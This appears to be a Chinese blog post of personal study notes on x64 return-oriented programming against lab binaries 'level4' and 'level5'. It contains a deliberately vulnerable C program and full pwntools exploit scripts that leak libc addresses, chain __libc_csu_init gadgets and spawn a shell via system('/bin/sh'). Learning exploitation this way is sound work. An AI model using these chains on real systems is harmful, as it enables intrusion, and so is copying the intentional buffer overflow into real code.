rop x64分析记录

最新推荐文章于 2022-09-12 19:09:50 发布
最新推荐文章于 2022-09-12 19:09:50 发布
阅读量563 收藏
点赞数
分类专栏: linux

rop x64分析记录

#

#!c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <dlfcn.h>

void systemaddr()
{
    void* handle = dlopen("libc.so.6", RTLD_LAZY);
    printf("%p\n",dlsym(handle,"system"));
    fflush(stdout);
}

void vulnerable_function() {
    char buf[128];
    read(STDIN_FILENO, buf, 512);
}

int main(int argc, char** argv) {
    systemaddr();
    write(1, "Hello, World\n", 13);
    vulnerable_function();
}
#!python
#!/usr/bin/env python
from pwn import *

libc = ELF('libc.so.6')

p = process('./level4')
#p = remote('127.0.0.1',10001)

binsh_addr_offset = next(libc.search('/bin/sh')) -libc.symbols['system']      //字符串偏移
print "binsh_addr_offset = " + hex(binsh_addr_offset)

pop_ret_offset = 0x0000000000022a12 - libc.symbols['system']   //
print "pop_ret_offset = " + hex(pop_ret_offset)

#pop_pop_call_offset = 0x00000000000f4739 - libc.symbols['system']
#print "pop_pop_call_offset = " + hex(pop_pop_call_offset)

print "\n##########receiving system addr##########\n"
system_addr_str = p.recvuntil('\n')
system_addr = int(system_addr_str,16)
print "system_addr = " + hex(system_addr)

binsh_addr = system_addr + binsh_addr_offset
print "binsh_addr = " + hex(binsh_addr)


pop_ret_addr = system_addr + pop_ret_offset
print "pop_ret_addr = " + hex(pop_ret_addr)

#pop_pop_call_addr = system_addr + pop_pop_call_offset
#print "pop_pop_call_addr = " + hex(pop_pop_call_addr)

p.recv()

payload = "\x00"*136 + p64(pop_ret_addr) + p64(binsh_addr) + p64(system_addr) 

#payload = "\x00"*136 + p64(pop_pop_call_addr) + p64(system_addr) + p64(binsh_addr) 

print "\n##########sending payload##########\n"
p.send(payload)

p.interactive()

objdump -d ./level5观察一下__libc_csu_init()这个函数。
x86中参数都是保存在栈上,但在x64中的前六个参数依次保存在RDI, RSI, RDX, RCX, R8和 R9中,如果还有更多的参数的话才会保存在栈上。

#!bash
$ ROPgadget --binary level4 --only "pop|ret" 
Gadgets information
============================================================
0x00000000004006d2 : pop rbp ; ret
0x00000000004006d1 : pop rbx ; pop rbp ; ret
0x0000000000400585 : ret
0x0000000000400735 : ret 0xbdb8
结果并不理想,因为程序比较小,在目标程序中并不能找到pop rdi; ret这个gadget。怎么办呢?解决方案是寻找libc.so中的gadgets。因为程序本身会load libc.so到内存中并且会打印system()的地址。所以当我们找到gadgets后可以通过system()计算出偏移量后调用对应的gadgets。

#!bash
$ ROPgadget --binary libc.so.6 --only "pop|ret" | grep rdi
0x000000000001f27d : pop rdi ; pop rbp ; ret
0x00000000000205cd : pop rdi ; pop rbx ; pop rbp ; ret
0x0000000000073033 : pop rdi ; pop rbx ; ret
0x0000000000022a12 : pop rdi ; ret

说我们用objdump -d ./level5观察一下__libc_csu_init()这个函数。一般来说,只要程序调用了libc.so,程序都会有这个函数用来对libc进行初始化操作。


00000000004005a0 <__libc_csu_init>:
  4005a0:   48 89 6c 24 d8          mov    %rbp,-0x28(%rsp)
  4005a5:   4c 89 64 24 e0          mov    %r12,-0x20(%rsp)
  4005aa:   48 8d 2d 73 08 20 00    lea    0x200873(%rip),%rbp        # 600e24 <__init_array_end>
  4005b1:   4c 8d 25 6c 08 20 00    lea    0x20086c(%rip),%r12        # 600e24 <__init_array_end>
  4005b8:   4c 89 6c 24 e8          mov    %r13,-0x18(%rsp)
  4005bd:   4c 89 74 24 f0          mov    %r14,-0x10(%rsp)
  4005c2:   4c 89 7c 24 f8          mov    %r15,-0x8(%rsp)
  4005c7:   48 89 5c 24 d0          mov    %rbx,-0x30(%rsp)
  4005cc:   48 83 ec 38             sub    $0x38,%rsp
  4005d0:   4c 29 e5                sub    %r12,%rbp
  4005d3:   41 89 fd                mov    %edi,%r13d
  4005d6:   49 89 f6                mov    %rsi,%r14
  4005d9:   48 c1 fd 03             sar    $0x3,%rbp
  4005dd:   49 89 d7                mov    %rdx,%r15
  4005e0:   e8 1b fe ff ff          callq  400400 <_init>
  4005e5:   48 85 ed                test   %rbp,%rbp
  4005e8:   74 1c                   je     400606 <__libc_csu_init+0x66>
  4005ea:   31 db                   xor    %ebx,%ebx
  4005ec:   0f 1f 40 00             nopl   0x0(%rax)
  4005f0:   4c 89 fa                mov    %r15,%rdx
  4005f3:   4c 89 f6                mov    %r14,%rsi
  4005f6:   44 89 ef                mov    %r13d,%edi
  4005f9:   41 ff 14 dc             callq  *(%r12,%rbx,8)
  4005fd:   48 83 c3 01             add    $0x1,%rbx
  400601:   48 39 eb                cmp    %rbp,%rbx
  400604:   75 ea                   jne    4005f0 <__libc_csu_init+0x50>
  400606:   48 8b 5c 24 08          mov    0x8(%rsp),%rbx
  40060b:   48 8b 6c 24 10          mov    0x10(%rsp),%rbp
  400610:   4c 8b 64 24 18          mov    0x18(%rsp),%r12
  400615:   4c 8b 6c 24 20          mov    0x20(%rsp),%r13
  40061a:   4c 8b 74 24 28          mov    0x28(%rsp),%r14
  40061f:   4c 8b 7c 24 30          mov    0x30(%rsp),%r15
  //这个表达式刚开始没懂,不过猜测应该      %r15=%rsp-0x30
  400624:   48 83 c4 38             add    $0x38,%rsp
  400628:   c3                      retq

看到利用0x400606处的代码我们可以控制rbx,rbp,r12,r13,r14和r15的值,随后利用0x4005f0处的代码我们将r15的值赋值给rdx, r14的值赋值给rsi,r13的值赋值给edi,随后就会调用call qword ptr [r12+rbx*8]。这时候我们只要再将rbx的值赋值为0,再通过精心构造栈上的数据,我们就可以控制pc去调用我们想要调用的函数了(比如说write函数)。执行完call qword ptr [r12+rbx*8]之后,程序会对rbx+=1,然后对比rbp和rbx的值,如果相等就会继续向下执行并ret到我们想要继续执行的地址。所以为了让rbp和rbx的值相等,我们可以将rbp的值设置为1,因为之前已经将rbx的值设置为0了。大概思路就是这样,我们下来构造ROP链。

先构造payload1,利用write()输出write在内存中的地址。注意我们的gadget是call qword ptr [r12+rbx*8],所以我们应该使用write.got的地址而不是write.plt的地址。并且为了返回到原程序中,重复利用buffer overflow的漏洞,我们需要继续覆盖栈上的数据,直到把返回值覆盖成目标函数的main函数为止。
这里写图片描述
大致got和plt的关系是这样的。plt目测有个可以在got写地址的函数,首次调用会计算真是函数地址,写入got。之后就会直接got调用真实地址。

这里调用call 应该只能是真实地址。这里跳转地址应该也可以,有点不明白。

#!bash
#rdi=  edi = r13,  rsi = r14, rdx = r15 
#write(rdi=1, rsi=write.got, rdx=4)
payload1 =  "\x00"*136
payload1 += p64(0x400606) + p64(0) +p64(0) + p64(1) + p64(got_write) + p64(1) + p64(got_write) + p64(8) # pop_junk_rbx_rbp_r12_r13_r14_r15_ret
#刚开始没懂,后来发现add    $0x38,%rsp这句好像直接把上面的都弹出去了
payload1 += p64(0x4005F0) # mov rdx, r15; mov rsi, r14; mov edi, r13d; call qword ptr [r12+rbx*8]
payload1 += "\x00"*56
payload1 += p64(main)

rbx=0,rbp=0,r12=1,r13=got_write,r14=1,r15=got_write,
rdx=got_write,rsi=1,rdi=got_write,rbx=0,rbp=0,r12=1,
RDI, RSI, RDX, RCX, R8和 R9
got_write,1,got_write
当我们exp在收到write()在内存中的地址后,就可以计算出system()在内存中的地址了。接着我们构造payload2,利用read()将system()的地址以及“/bin/sh”读入到.bss段内存中。

#!bash
#rdi=  edi = r13,  rsi = r14, rdx = r15 
#read(rdi=0, rsi=bss_addr, rdx=16)
payload2 =  "\x00"*136
payload2 += p64(0x400606) + p64(0) + p64(0) + p64(1) + p64(got_read) + p64(0) + p64(bss_addr) + p64(16) # pop_junk_rbx_rbp_r12_r13_r14_r15_ret
payload2 += p64(0x4005F0) # mov rdx, r15; mov rsi, r14; mov edi, r13d; call qword ptr [r12+rbx*8]
payload2 += "\x00"*56
payload2 += p64(main)
最后我们构造payload3,调用system()函数执行“/bin/sh”。注意,system()的地址保存在了.bss段首地址上,“/bin/sh”的地址保存在了.bss段首地址+8字节上。

#!bash
#rdi=  edi = r13,  rsi = r14, rdx = r15 
#system(rdi = bss_addr+8 = "/bin/sh")
payload3 =  "\x00"*136
payload3 += p64(0x400606) + p64(0) +p64(0) + p64(1) + p64(bss_addr) + p64(bss_addr+8) + p64(0) + p64(0) # pop_junk_rbx_rbp_r12_r13_r14_r15_ret
payload3 += p64(0x4005F0) # mov rdx, r15; mov rsi, r14; mov edi, r13d; call qword ptr [r12+rbx*8]
payload3 += "\x00"*56
payload3 += p64(main)
#!python
#!/usr/bin/env python
from pwn import *

elf = ELF('level5')
libc = ELF('libc.so.6')

p = process('./level5')
#p = remote('127.0.0.1',10001)

got_write = elf.got['write']
print "got_write: " + hex(got_write)
got_read = elf.got['read']
print "got_read: " + hex(got_read)

main = 0x400564

off_system_addr = libc.symbols['write'] - libc.symbols['system']
print "off_system_addr: " + hex(off_system_addr)

#rdi=  edi = r13,  rsi = r14, rdx = r15 
#write(rdi=1, rsi=write.got, rdx=4)
payload1 =  "\x00"*136
payload1 += p64(0x400606) + p64(0) +p64(0) + p64(1) + p64(got_write) + p64(1) + p64(got_write) + p64(8) # pop_junk_rbx_rbp_r12_r13_r14_r15_ret
payload1 += p64(0x4005F0) # mov rdx, r15; mov rsi, r14; mov edi, r13d; call qword ptr [r12+rbx*8]
payload1 += "\x00"*56
payload1 += p64(main)

p.recvuntil("Hello, World\n")

print "\n#############sending payload1#############\n"
p.send(payload1)
sleep(1)

write_addr = u64(p.recv(8))
print "write_addr: " + hex(write_addr)

system_addr = write_addr - off_system_addr
print "system_addr: " + hex(system_addr)

bss_addr=0x601028

p.recvuntil("Hello, World\n")

#rdi=  edi = r13,  rsi = r14, rdx = r15 
#read(rdi=0, rsi=bss_addr, rdx=16)
payload2 =  "\x00"*136
payload2 += p64(0x400606) + p64(0) + p64(0) + p64(1) + p64(got_read) + p64(0) + p64(bss_addr) + p64(16) # pop_junk_rbx_rbp_r12_r13_r14_r15_ret
payload2 += p64(0x4005F0) # mov rdx, r15; mov rsi, r14; mov edi, r13d; call qword ptr [r12+rbx*8]
payload2 += "\x00"*56
payload2 += p64(main)

print "\n#############sending payload2#############\n"
p.send(payload2)
sleep(1)

p.send(p64(system_addr))
p.send("/bin/sh\0")
sleep(1)

p.recvuntil("Hello, World\n")

#rdi=  edi = r13,  rsi = r14, rdx = r15 
#system(rdi = bss_addr+8 = "/bin/sh")
payload3 =  "\x00"*136
payload3 += p64(0x400606) + p64(0) +p64(0) + p64(1) + p64(bss_addr) + p64(bss_addr+8) + p64(0) + p64(0) # pop_junk_rbx_rbp_r12_r13_r14_r15_ret
payload3 += p64(0x4005F0) # mov rdx, r15; mov rsi, r14; mov edi, r13d; call qword ptr [r12+rbx*8]
payload3 += "\x00"*56
payload3 += p64(main)

print "\n#############sending payload3#############\n"

sleep(1)
p.send(payload3)

p.interactive()
inquisiter
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
再探ROP(上)
KKABqN
04-07 1553
0x00 前记 毕设和论文要搞吐了,再加上实习驻场事情,近期又要开始准备HW的事情,只能先更新一部分。 0x01 从x86到x64 之前的rop都是32bit的程序,由于这篇文章涉及的方法用于64bit的程序,这里先说一下两者的区别,做一下过渡。 首先是寄存器传参和堆栈传参的区别,这里以一个例子说明 在32bit的程序中,如上图所示,在函数调用前,参数会被依次入栈;然而再64bit的同...............
深入探究64位rop链构造,wp中常见的万能gadgets详解| 攻防世界pwn进阶区welpwn
Kni9hT's Blog
03-20 1662
文章目录前言思路分析0x00.检查保护机制0x01.找到溢出点0x02.跳过echo在buf上构造rop0x03.选择合适的gadgets0x04.万能的通用gadgets利用过程使用DynELF使用LibcSearcher 前言 这一题做的时间跨度比较长了,断断续续做了一天多,然后尝试了两种方式,一种是DynELF泄露system地址,还有一种是利用python的LibcSearcher模块得到...
64位ROP(level5)
weixin_44642009的博客
04-06 1430
64位ROP 开始接触的ROP都是针对于32位,和64位的比起来,主要是编址以及函数传参的方式不一样,32位的传参是直接将其压入栈中,我们便可以通过覆盖返回地址的方法,对函数的跳转进行控制而达到我们的目的,而64位的传参首先是使用六个寄存器,其次更多的参数压入栈中,其参数存放寄存器的顺序依次是rdirdirdi,rsirsirsi,rdxrdxrdx,rcxrcxrcx,r8dr8dr8d,r9d...
64位ROP——通用gadget
qq_44759495的博客
04-09 2839
原理与目的 程序在编译的时候会加入一些通用函数来进行初始化操作,所以可以针对初始化函数来提取一些通用的gadget,通过泄露某个在libc中的内容在内存中的实际地址,通过计算偏移量来得到system和bin/sh的地址,然后利用返回指令ret连接代码,最终getshell。 实验步骤 chechsec命令检查是否有canary保护 图中显示并没有,如果有的话,就先进行泄露。 IDA反汇编 int...
【How2Pwn】DreamHack x64下的ROP问题
Jeongon的博客
09-04 914
Pwn中的ROP问题演示
朗讯系统ROP分析.pdf
09-30
朗讯系统ROP分析.pdf
rop轻松谈.pdf
10-21
ROP輕鬆談 ROP(Return Oriented Programming)是一種exploit技术,該技術通過在程式碼中注入惡意代碼,控制程式的執行流程,達到攻擊的目的。本文將對ROP技術進行詳細的介紹,涵蓋ROP的基本概念、Buffer Overflow...
rop开放平台
04-12
1. **漏洞分析**:用户可以上传目标二进制文件,平台会分析其是否存在适合构造ROP链的gadgets。 2. **ROP链生成器**:用户可以输入想要执行的命令或函数调用,平台会自动寻找合适的gadgets并构建完整的ROP链。 3. ...
xgadget:快速,并行,互变式ROPJOP小工具搜索x86x64二进制文件
02-08
小工具 快速,并行,交叉变量的ROP / JOP小工具搜索x86(32位)和x64(64位)二进制文件。 使用。 当前状态:测试覆盖面不错,但仍处于测试阶段。 欢迎发行/ PR :)关于据我所知, xgadget是第一个具有以下功能的小...
arm64_rop_exploit:Arm64返回定向编程(ROP)漏洞
03-02
arm64_rop_exploit arm64 rop小工具二进制文件,用于将arm64反向外壳程序代码映射到内存中并执行代码这仅适用于目标arm64设备。 用于将rop小工具映射到内存中并从libc库执行shell代码的源代码。 在运行Ubuntu 18.04....
X64之ROP
amae_coder的博客
04-10 619
实验步骤: 首先拿到文件先看看有没有什么栈保护 因为在生成文件的时候我们就已经关掉了地址随机化,所以这里并没有什么栈保护 将文件拖入IDA中进行反编译,然后静态分析 这里有先写入hello world ,然后又进入了vulnerable_function函数,我们进入函数看看 我们发现用到了read函数,这里用到的是rbp定位,而它读了200个,实际rbp到ret只有(80...
64位栈溢出简单rop与简单例题的复现
goat_2003的博客
09-18 651
首先还是找到关键函数 可以看到有read栈溢出漏洞,有system函数,查看字符串,还可以看到"/bin/sh",既然这样,我们便可以一步到位直接通过rop将/bin/sh装入system函数中getshell。 如何通过rop实现传参呢?64位ELF是通过寄存器存放参数的,所以我们要想办法将/bin/sh放入rdi中并紧接着调用system函数。 那么该如何实现呢?我们假设一下,先通过pop edi将/bin/sh的地址压入edi中,然后再执行ret,并将此时的esp所指向栈空间的值改为system函数
rop、64位程序中参数传递及栈溢出利用
RKAnjia的博客
11-24 820
ctf64位程序中参数传递及栈溢出利用rop 64位程序中参数传递及栈溢出利用 32位程序参数传递是直接弹出栈顶元素作为参数,而64位程序通过edi寄存器传参;因此在栈溢出漏洞利用的步骤为: 找到“pop edi\rdi;ret;”语句、system函数和“bin/sh”字符串的地址,输入数据:【填满栈空间的数据+覆盖edb的数据(32位大小为4h,64位大小为8h)+“pop edi\rdi;ret;”语句的地址+“bin/sh”字符串的地址+system函数的地址】。 具体执行过程: 子函数调用结束时,
pwn篇:32位及64位无PIE保护ROP方法
weixin_44644249的博客
02-03 1282
32位和64位ROP方法 先记录一下,暂时还没有学会绕过PIE 源码 #include<stdio.h> #include<unistd.h> void vuln_func() { char buf[128]; read(STDIN_FILENO,buf,256);//溢出点 } int main(int argc,char* argv[]) { vuln_func(); write(STDOUT_FILENO,"Hello world\n",13); } 32位 编译
PWN入门(5)32位程序与64位程序和构造ROP
Ba1_Ma0的博客
09-12 1635
pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的位置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用。
ROP实例分析(三)--------------------------实例分析
iDevil7的博客
07-13 1399
实例分析源程序如下IDA分析分析过程首先关注mian函数可以看到程序流程设置定时器打印输出Welcometo RCTF\n清空_bss_start数据流读取用户输入到buff(1024字节)中去调用echo函数,参数为buff然后看子函数echo,该子程序流程如下将用户输入的buff逐字节地拷贝到s2(16字节)中,如果遇到\x00截断于是我们找到了漏洞所在处我们要做的工作就是覆盖返回地址并且构造...
一步一步学习ROP之linux-x64
zsj2102的专栏
11-17 1002
0x00 序 ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。上次我们主要讨论了linux_x86的ROP攻击。 一步一步学ROP之linux_x86篇 http://drops.wooyun.org/tips/6597 在这次的教程中我们会带来上一篇的
linux内核rop姿势详解,[原创]rop链攻击原理与思路(x86/x64)
weixin_42397925的博客
05-02 783
rop链的基础原理rop是Return Oriented Programming(面向返回的编程)的缩写;根据函数调用规则,当刚跳转到其它函数去执行时,从被调用者的视角看:栈顶是返回地址,紧接着是自己的参数(X86架构下);然后,被调用者会对栈空间进行一系列操作,保存寄存器和存储临时变量,但在即将退出时会清理自己消耗的栈空间,以使其回到自己被调用前的栈空间,保持栈平衡;最后,被调用者以ret指令结...
使用ROP攻击技术
热门推荐
海枫的专栏
09-28 3万+
随着64系统广泛应用,原来通过栈控制函数参数的方法已不再适用了,攻击提出ROP攻击,又展开了一场新的较量。
arm64 的 rop 实现
最新发布
03-31
ROP(Return Oriented Programming)是一种攻击技术...需要注意的是,由于ARM64架构中的指令是64位的,因此在构造ROP链时需要使用64位的地址和指令。另外,在实现ROP攻击时,还需要考虑栈保护和ASLR等安全机制的影响。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值